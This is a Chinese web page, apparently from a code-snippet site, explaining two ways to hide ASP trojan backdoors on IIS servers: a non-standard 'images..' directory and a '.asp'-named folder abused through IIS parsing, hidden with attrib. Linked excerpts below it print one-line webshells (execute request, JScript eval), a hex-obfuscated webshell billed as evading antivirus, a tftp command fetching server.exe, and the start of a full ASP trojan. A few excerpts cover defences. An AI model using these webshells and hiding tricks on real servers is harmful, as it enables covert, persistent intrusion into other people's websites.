隐藏ASP木马后门的两种方法
1、建立非标准目录:mkdir images..\
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
通过web访问ASP木马:http://ip/images../news.asp?action=login
如何删除非标准目录:rmdir images..\ /s
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
mkdir programme.asp
新建1.txt文件内容:
新建12.jpg文件内容: 或使用GIF与ASP合并后的文件
attrib +H +S programme.asp
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
相关推荐
-
asp一句话木马原理分析
通过HTTP协议来访问 一句话木马的使用范围(我只列举了2种): 1)只有数据库备份的情况 数据库备份成asp文件时候,不出现" 编译错误,缺少脚本关闭标志%>" 2)SA权限的时候,一般先写入一句话,图个方便..(当然,直接tftp上传鸽子运行,那更快) tftp -i ip get server.exe 一句话木马<%execute request("a")%>的原理: 首先知道 execute()函数,是用来执行asp代码的.就是负责执行我们
-
asp.net jscript 一句话木马
min.aspx 复制代码 代码如下: <%@ Page Language="Jscript"%><%eval(Request.Item["z"],"unsafe");%> 复制代码 代码如下: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/x
-
如何防范ASP木马
修改三个组件来达到防asp木马攻击.FileSystemObject组件---对文件进行常规操作.WScript.Shell组件---可以调用系统内核运行DOS命令.Shell.Application组件--可以调用系统内核运行DOS命令. 一.使用FileSystemObject组件 1.可以通过修改注册表,将此组件改名,来防止此类木马的危害. HKEY_CLASSES_ROOT\Scripting.FileSystemObject\改名为其它的名字,如:改为FileSystemObject_
-
aspx超强木马查杀与防范(web网马)
复制代码 代码如下: <%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%><%@ import Namespace="System.IO"%><
-
防范ASP木马的十大基本原则强列建议看下
由于ASP它本身是服务器提供的一项服务功能,特别是最近由dvbbs的upfile文件出现漏洞以来,其高度的隐蔽性和难查杀性,对网站的安全造成了严重的威胁.因此针对ASP木马的防范和清除,为网管人员提出了更高的技术要求. 几个大的程序全部被发现存在上传漏洞,小程序更是不计其数,让asp木马一下占据了主流,得到广泛的使用,想必如果你是做服务器的话,一定为此头疼不止吧,特别是虚拟主机的用户都遇到过网页被篡改.数据被删除的经历,事后除了对这种行径深恶痛绝外,许多客户又苦于没有行之有效的防范措施.鉴于大部
-
更牛的一句话asp木马加密(去掉asp里的%)
不知道怎样表达清楚.看例子吧: 复制代码 代码如下: <script language=vbs runat=server> Execute(HextoStr("65786563757465287265717565737428636872283335292929")) Function HextoStr(data) HextoStr="EXECUTE """"" C="&CHR(&
-
ASP下检测图片木马的函数代码
木马原理:入侵者使用诸如ASP图片木马生成器之类的工具将一张正常的图片与一个ASP木马文件合并成一个图片文件(即将对网站有害的 ASP代码插在图片编码之后,虽然图片仍然可以正常显示,但是文件内容和尺寸已被改变),然后通过网站提供的文件上传功能上传这一张"合 '法的"图片,进而实现了上传ASP木马的目的. ' 防范方法:因为这种木马是图片与木马的二合一,所以需要在上传图片前检查文件内容,若文件内容不合法(即包含有恶意代码在里面), '则禁止上传,从而堵住了木马攻击的源头,这是木马攻击的第
-
ASP防止图片木马上传的代码
ASP木马防御: 复制代码 代码如下: const adTypeBinary=1 dim jpg(1):jpg(0)=CByte(&HFF):jpg(1)=CByte(&HD8) dim bmp(1):bmp(0)=CByte(&H42):bmp(1)=CByte(&H4D) dim png(3):png(0)=CByte(&H89):png(1)=CByte(&H50):png(2)=CByte(&H4E):png(3)=CByte(&H4
-
一句话木马的原理及利用分析(asp,aspx,php,jsp)
一句话木马的适用环境: 1.服务器的来宾账户有写入权限 2.已知数据库地址且数据库格式为asa或asp 3.在数据库格式不为asp或asa的情况下,如果能将一句话插入到asp文件中也可 一句话木马的工作原理: "一句话木马"服务端(本地的html提交文件) 就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 <%execute request("
-
asp,php一句话木马整理方便查找木马
特把经常用到的网页后门的木马整理下,如果不全请大家补全他,大家在网站混口饭吃,都不容易何必呢 asp一句话木马 文件常见内容 <%If Request("#")<>"" Then Execute(Request("#"))%> execute(request("#")); eval(request("#")); php一句话木马 <?@include($_POST["
-
一句话 asp木马加密版 彻底突破杀毒软件
不知道怎样表达清楚.看例子吧: 复制代码 代码如下: <script language=vbs runat=server> Execute(HextoStr("65786563757465287265717565737428636872283335292929")) Function HextoStr(data) HextoStr="EXECUTE """"" C="&CHR(&H
-
一款不错的asp木马 黑色界面
<% Server.ScriptTimeout=999999999 Response.Buffer =true On Error Resume Next UserPass="643617" '密码 mName="BY:.尐飛" '后门名字 Copyright="注:请勿用于非法用途,否则后果作者概不负责" '版权 Server.ScriptTimeout=9
-
有效防止ASP木马上传运行—小知识[网络安全技术]
一般现今ASP木马常通过以下四点来操作服务器,所以我们只要将一下四处设置好就能从一 前使用IIS服务器的站长很多,特别是对于ASP网站来说,防止ASP木马成了网站安全最关键的内容. 一般现今ASP木马常通过以下四点来操作服务器,所以我们只要将一下四处设置好就能从一定程度上有效防止ASP木马的入侵 一.使用FileSystemObject组件 FileSystemObject可以对文件进行常规操作 可以通过修改注册表,将此组件改名,来防止此类木马的危害. HKEY_CLASSES_ROOT\Scr
随机推荐
- Prototype中dom对象方法汇总
- W3C Group的JavaScript1.8 新特性介绍
- php通过正则表达式记取数据来读取xml的方法
- 一个可分页的基于文本的PHP留言板源码第1/2页
- Android使用控件ImageView加载图片的方法
- 用jquery写的一个万年历(自写)
- asp.net 使用ObjectDataSource控件在ASP.NET中实现Ajax真分页
- dos批量替换当前目录后缀名的实现代码
- 一个获取第n个元素节点的js函数
- Python中的多行注释文档编写风格汇总
- MySQL中的RAND()函数使用详解
- SQL Server查询前N条记录的常用方法小结
- 基于JQuery的列表拖动排序实现代码
- Jquery常用的方法汇总
- PHP 图片上传代码
- C++入门之基础语法学习教程
- java后台利用Apache poi 生成excel文档提供前台下载示例
- C++中Cbitmap,HBitmap,Bitmap区别及联系
- docker常用命令操作方法
- ThinkPHP3.2框架操作Redis的方法分析